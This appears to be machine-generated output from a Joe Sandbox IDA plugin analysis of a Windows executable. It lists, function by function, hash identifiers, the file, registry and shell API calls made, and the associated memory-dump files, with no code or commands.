                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2547128583-0
                                                                                                                                                            • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                                            • Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
                                                                                                                                                            • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                                                            • Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA
                                                                                                                                                            APIs
                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                            • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                            • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                                                                                            • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                                                            • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                                                                                            APIs
                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                            • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                            • Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
                                                                                                                                                            • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                            • Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694
                                                                                                                                                            APIs
                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                                                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                            • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                            • Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
                                                                                                                                                            • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                            • Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D
                                                                                                                                                            APIs
                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040240E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 390214022-0
                                                                                                                                                            • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                                                                                            • Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
                                                                                                                                                            • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                                                                                            • Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D
                                                                                                                                                            APIs
                                                                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Create
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                            • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                                            • Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
                                                                                                                                                            • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                                            • Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674
                                                                                                                                                            APIs
                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                            • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                            • Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
                                                                                                                                                            • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                            • Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4
                                                                                                                                                            APIs
                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                            • Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
                                                                                                                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                            • Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4
                                                                                                                                                            APIs
                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: PrivateProfileString
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1096422788-0
                                                                                                                                                            • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                                                            • Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
                                                                                                                                                            • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                                                            • Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759
                                                                                                                                                            APIs
                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040643C,?,?,?,?,: Completed,?,00000000), ref: 004063D2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Open
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                            • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                            • Instruction ID: 160c38975f312424f4866d14917befa5dd24af40cdf73f4d33e28196d90f96f9
                                                                                                                                                            • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                            • Instruction Fuzzy Hash: 44D0123204020EBBDF115E90ED01FAB3B1DAB08350F014426FE06E40A0D775D534A754
                                                                                                                                                            APIs
                                                                                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                            • Opcode ID: 505856000b56d662a9aa875b3a3f8f40bf86435686472c5d4cf907b3c1585cba
                                                                                                                                                            • Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
                                                                                                                                                            • Opcode Fuzzy Hash: 505856000b56d662a9aa875b3a3f8f40bf86435686472c5d4cf907b3c1585cba
                                                                                                                                                            • Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D
                                                                                                                                                            APIs
                                                                                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                            • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                                                                                            • Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
                                                                                                                                                            • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                                                                                            • Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D
                                                                                                                                                            APIs
                                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00405B76
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExecuteShell
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 587946157-0
                                                                                                                                                            • Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                                                                                                                            • Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
                                                                                                                                                            • Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
                                                                                                                                                            • Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29
                                                                                                                                                            APIs
                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
